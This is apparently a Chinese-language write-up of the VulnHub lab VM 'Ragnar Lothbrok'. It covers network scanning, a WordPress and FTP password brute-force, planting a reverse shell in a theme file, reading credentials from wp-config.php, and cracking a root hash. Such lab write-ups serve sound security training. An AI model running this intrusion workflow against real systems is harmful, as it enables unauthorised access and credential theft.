Ragnar-lothbrok
作者:Jason_huawen
目标主机基本信息
名称:Ragnar Lothbrok: 1
地址:
https://www.vulnhub.com/entry/ragnar-lothbrok-1,612/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.67.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:be:bb:0d 1 60 PCS Systemtechnik GmbH
192.168.56.237 08:00:27:16:4f:c0 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.237
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.237 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 08:36 EST
Nmap scan report for bogon (192.168.56.237)
Host is up (0.00061s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
80/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0
443/tcp open ssl/http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0)
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T09:10:30
|_Not valid after: 2010-09-30T09:10:30
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '192.168.56.206' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=11/28%Time=6384B969%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.56\.206'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
MAC Address: 08:00:27:16:4F:C0 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.28 seconds
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ ftp 192.168.56.237
Connected to 192.168.56.237.
220 ProFTPD Server (ProFTPD) [::ffff:192.168.56.237]
Name (192.168.56.237:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
目标主机不允许匿名访问。
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.237 armbjorn
访问80端口,返回默认页面。
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ nikto -h http://192.168.56.237
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.237
+ Target Hostname: 192.168.56.237
+ Target Port: 80
+ Start Time: 2022-11-28 08:44:12 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0
+ Retrieved x-powered-by header: PHP/7.2.34
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.56.237/dashboard/
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8724 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2022-11-28 08:45:09 (GMT-5) (57 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (PHP/7.2.34 Perl/v5.32.0 Apache/2.4.46 mod_perl/2.0.11) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ gobuster dir -u http://192.168.56.237 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.237
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/28 08:50:08 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 234] [--> http://192.168.56.237/img/]
/wordpress (Status: 301) [Size: 240] [--> http://192.168.56.237/wordpress/]
/dashboard (Status: 301) [Size: 240] [--> http://192.168.56.237/dashboard/]
/secret (Status: 200) [Size: 40578]
/phpmyadmin (Status: 403) [Size: 1192]
/webalizer (Status: 301) [Size: 240] [--> http://192.168.56.237/webalizer/]
Progress: 218972 / 220561 (99.28%)===============================================================
2022/11/28 08:51:06 Finished
===============================================================
──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ curl http://192.168.56.237/secret > list
secret应该是密码字典,而目标主机有wordpress站点,因此用wpscan扫描一下:
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ wpscan --url http://192.168.56.237/wordpress -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.237/wordpress/ [192.168.56.237]
[+] Started: Mon Nov 28 08:53:53 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0
| - X-Powered-By: PHP/7.2.34
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.237/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.237/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.237/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.237/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.237/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.237/wordpress/, Match: 'WordPress 5.5.3'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] ragnar
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Nov 28 08:53:57 2022
[+] Requests Done: 53
[+] Cached Requests: 7
[+] Data Sent: 13.799 KB
[+] Data Received: 368.11 KB
[+] Memory used: 211.41 MB
[+] Elapsed time: 00:00:03
识别出来用户ragnar,用前面得到的密码字典破解一下:
──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ wpscan --url http://192.168.56.237/wordpress -U ragnar -P list
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.237/wordpress/ [192.168.56.237]
[+] Started: Mon Nov 28 08:54:54 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0
| - X-Powered-By: PHP/7.2.34
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.237/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.237/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.237/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.237/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.237/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.237/wordpress/, Match: 'WordPress 5.5.3'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
Trying ragnar / 이바르 Time: 00:00:55 <========== > (912 / 4617) 19.75% ETA: 00:03Trying ragnar / 베이늘라우시 Time: 00:00:55 <========= > (913 / 4617) 19.77% ETA: 00Trying ragnar / 古诺斯语 Time: 00:03:29 <======================================= > (3469 / 4617) 75.13% ETA: 00:0Trying ragnar / 아이슬란드어 Time: 00:04:02 <=========================================== > (4009 / 4617) 86.83% ETA: 00Trying ragnar / アイスランド語 Time: 00:04:05 <========================================== > (4061 / 4617) 87.95% ETA: 0Trying ragnar / ubbe Time: 00:04:39 <===================================================> (4617 / 4617) 100.00% Time: 00:04:39
Trying ragnar / ubbe Time: 00:04:39 <========================== > (4617 / 9234) 50.00% ETA: ??:??:??
[SUCCESS] - ragnar / ubbe
[!] Valid Combinations Found:
| Username: ragnar, Password: ubbe
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Nov 28 08:59:36 2022
[+] Requests Done: 4759
[+] Cached Requests: 28
[+] Data Sent: 2.481 MB
[+] Data Received: 2.9 MB
[+] Memory used: 262.422 MB
[+] Elapsed time: 00:04:41
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
密码破解成功:
username: ragnar
password: ubbe
利用该用户名和密码登录wordpress管理后台,到Appearnce -> Theme Editor -> Theme Files -> 404.php,将shell.php代码拷贝替换,点击update file。
404.php的位置可以通过查看前台页面源代码:
<link rel='stylesheet' id='admin-bar-css' href='http://armbjorn/wordpress/wp-includes/css/admin-bar.min.css?ver=5.5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://armbjorn/wordpress/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3' media='all' />
<link rel='stylesheet' id='twentytwenty-style-css' href='http://armbjorn/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5' media='all' />
猜测404.php可以通过下面的URL访问:
http://armbjorn/wordpress/wp-content/themes/twentytwenty/404.php
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.237] 51436
Linux osboxes 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
09:06:03 up 32 min, 0 users, load average: 0.03, 0.89, 1.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
daemon@osboxes:/$
在Kali Linux成功得到了目标主机反弹回来的shell:
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.237] 51436
Linux osboxes 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
09:06:03 up 32 min, 0 users, load average: 0.03, 0.89, 1.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
daemon@osboxes:/$
提权
将linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,并执行脚本,从脚本输出结果可知wordpress所在的目录:
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
awk: write failure (Broken pipe)
awk: close failed on file /dev/stdout (Broken pipe)
uniq: write error: Broken pipe
/dev/mqueue
/dev/shm
/opt/HiFriend.sh
/opt/lampp/htdocs/wordpress
/opt/lampp/htdocs/wordpress/index.php
/opt/lampp/htdocs/wordpress/license.txt
/opt/lampp/htdocs/wordpress/readme.html
/opt/lampp/htdocs/wordpress/wp-activate.php
/opt/lampp/htdocs/wordpress/wp-admin
/opt/lampp/htdocs/wordpress/wp-admin/about.php
/opt/lampp/htdocs/wordpress/wp-admin/admin-ajax.php
/opt/lampp/htdocs/wordpress/wp-admin/admin-footer.php
/opt/lampp/htdocs/wordpress/wp-admin/admin-functions.php
/opt/lampp/htdocs/wordpress/wp-admin/admin-header.php
#)You_can_write_even_more_files_inside_last_directory
daemon@osboxes:/opt/lampp/htdocs/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'joomla' );
/** MySQL database username */
define( 'DB_USER', 'joomla' );
/** MySQL database password */
define( 'DB_PASSWORD', 'joomla' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '~.xvY)Zi6h1ctO_J=W+*_|yLF+-Erbl25ySXl^$}FWVSIpHC88 W(&8iX`cTwlt ' );
define( 'SECURE_AUTH_KEY', 'IZ-l5wr..]s8Dq#t_24!mrp,iSAfGLC.{Wc9il,afSc2_eb=ku:GUx9Va@c)!oMV' );
define( 'LOGGED_IN_KEY', '*^ax>}zvd=9_dRhyq%5w>vdyQ4jeb~@7)wRUu,ojn@+6da !@p~P[khXF:=QS;n#' );
define( 'NONCE_KEY', '^fEIRBS,M7[8enz>#N1>Hvs>+0.3(BsrHLfNp9MU@lOU}+E<tT7bgK2!k.3S`j+a' );
define( 'AUTH_SALT', 'rV`PtwPCgm5~`N2LF+LA.STe?aHls`)ZE>j_h]tabyUL?`ts?-lCE3A`XM!d X?j' );
define( 'SECURE_AUTH_SALT', 'o4y2g^6QiupXVZJO(D#h<Zid&)Ap3V/laG|?}{6B~!.p@G<~G!ws=SC@=o;wDGn@' );
define( 'LOGGED_IN_SALT', '_y7t5_f{0qlgTk>Q-)^9}65+`t~`h?)E5j}B^S@H@?~K]?@2&4kTi5Qur)p!zJw$' );
define( 'NONCE_SALT', 'K|iwXrIS^7k9Y=|hwAVBw$O+e]Uboqefu5zFSp_pt!w)l!v2VQt&JWb,:$<p^zka' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
daemon@osboxes:/opt/lampp/htdocs/wordpress$
daemon@osboxes:/opt/lampp/htdocs/wordpress$ mysql -ujoomla -p
mysql -ujoomla -p
Traceback (most recent call last):
File "/usr/lib/command-not-found", line 28, in <module>
from CommandNotFound import CommandNotFound
File "/usr/lib/python3/dist-packages/CommandNotFound/CommandNotFound.py", line 19, in <module>
from CommandNotFound.db.db import SqliteDatabase
File "/usr/lib/python3/dist-packages/CommandNotFound/db/db.py", line 5, in <module>
import apt_pkg
ImportError: /opt/lampp/lib/libstdc++.so.6: version `CXXABI_1.3.8' not found (required by /usr/lib/python3/dist-packages/apt_pkg.cpython-38-x86_64-linux-gnu.so)
从wp-config.php文件得到了连接数据库的用户名和密码:
username: joomla
password: joomla
前面目录扫描时已经知道Phpmyadmin的位置,访问该目录,但是失败,只允许本地登录。
不过现在已经知道用户名ragnar了,用Hydra破解一下,因为目标主机没有开放SSH,因此破解一下FTP服务,还是用同样的字典
┌──(kali㉿kali)-[~/Vulnhub/Ragnar_lothbrok]
└─$ hydra -l ragnar -P list ftp://192.168.56.237
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-28 09:32:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4617 login tries (l:1/p:4617), ~289 tries per task
[DATA] attacking ftp://192.168.56.237:21/
[STATUS] 2934.00 tries/min, 2934 tries in 00:01h, 1683 to do in 00:01h, 16 active
[21][ftp] host: 192.168.56.237 login: ragnar password: lagertha
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-28 09:34:02
有理由相信这个密码也是ragnar的系统密码,因此切换到ragnar用户
ragnar@osboxes:~$ ls -alh
ls -alh
total 164K
drwx------ 14 ragnar ragnar 4.0K Dec 4 2020 .
drwxr-xr-x 3 root root 4.0K Dec 4 2020 ..
-rw------- 1 ragnar ragnar 610 Dec 4 2020 .bash_history
-rwx------ 1 ragnar ragnar 220 Dec 3 2020 .bash_logout
-rwx------ 1 ragnar ragnar 3.7K Dec 3 2020 .bashrc
drwx------ 8 ragnar ragnar 4.0K Dec 3 2020 .cache
drwx------ 13 ragnar ragnar 4.0K Dec 4 2020 .config
drwx------ 2 ragnar ragnar 4.0K Dec 4 2020 Desktop
-rwx------ 1 ragnar ragnar 25 Dec 3 2020 .dmrc
drwx------ 2 ragnar ragnar 4.0K Dec 3 2020 Documents
drwx------ 2 ragnar ragnar 4.0K Dec 3 2020 Downloads
drwx------ 3 ragnar ragnar 4.0K Dec 3 2020 .gnupg
drwx------ 3 ragnar ragnar 4.0K Dec 3 2020 .local
drwx------ 2 ragnar ragnar 4.0K Dec 3 2020 Music
drwx------ 2 ragnar ragnar 4.0K Dec 3 2020 Pictures
-rwx------ 1 ragnar ragnar 807 Dec 3 2020 .profile
drwx------ 2 ragnar ragnar 4.0K Dec 3 2020 Public
-rwx------ 1 ragnar ragnar 10 Dec 3 2020 .python_history
-rwx------ 1 ragnar ragnar 112 Dec 3 2020 secret
drwx------ 2 ragnar ragnar 4.0K Dec 3 2020 Templates
drwx------ 2 ragnar ragnar 4.0K Dec 3 2020 Videos
-rw------- 1 ragnar ragnar 52 Dec 4 2020 .Xauthority
-rw------- 1 ragnar ragnar 70K Dec 4 2020 .xsession-errors
ragnar@osboxes:~$ file secret
file secret
secret: ASCII text
ragnar@osboxes:~$ cat ./secret
cat ./secret
root:$6$hPrOGn8aOKa2ZMJm$gGKkorDjENhohzGBojBLO3ABOJEP/DjMtjRRl6FBlNAc.l.BnoH8rMWtWZiJGCTt2Nq5e7DFe51RRRTXjzN5h.
ragnar@osboxes:~$
注意访问找了的secret需要是./secret
将root的密码(哈希值)下载到Kali LInux本地,用john破解该密码:
得到root的密码 kevinmitnick
ragnar@osboxes:~$ su root
su root
Password: kevinmitnick
root@osboxes:/home/ragnar# cd /root
cd /root
root@osboxes:~# ls -alh
ls -alh
total 56K
drwx------ 8 root root 4.0K Dec 4 2020 .
drwxr-xr-x 19 root root 4.0K Jul 31 2020 ..
-rw------- 1 root root 273 Dec 4 2020 .bash_history
-rw-r--r-- 1 root root 0 Dec 3 2020 .bashrc
drwx------ 5 root root 4.0K Dec 3 2020 .cache
drwxr-xr-x 5 root root 4.0K Dec 3 2020 .config
drwx------ 3 root root 4.0K Dec 3 2020 .dbus
drwxr-xr-x 2 root root 4.0K Dec 3 2020 Desktop
drwx------ 3 root root 4.0K Dec 3 2020 .gnupg
-rw-r--r-- 1 root root 129 Dec 3 2020 hello
drwxr-xr-x 3 root root 4.0K Dec 3 2020 .local
-rw------- 1 root root 18 Dec 3 2020 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 5 Dec 3 2020 .python_history
-rw-r--r-- 1 root root 66 Dec 3 2020 .selected_editor
root@osboxes:~# cd Desktop
cd Desktop
root@osboxes:~/Desktop# ls -alh
ls -alh
total 8.0K
drwxr-xr-x 2 root root 4.0K Dec 3 2020 .
drwx------ 8 root root 4.0K Dec 4 2020 ..
root@osboxes:~/Desktop#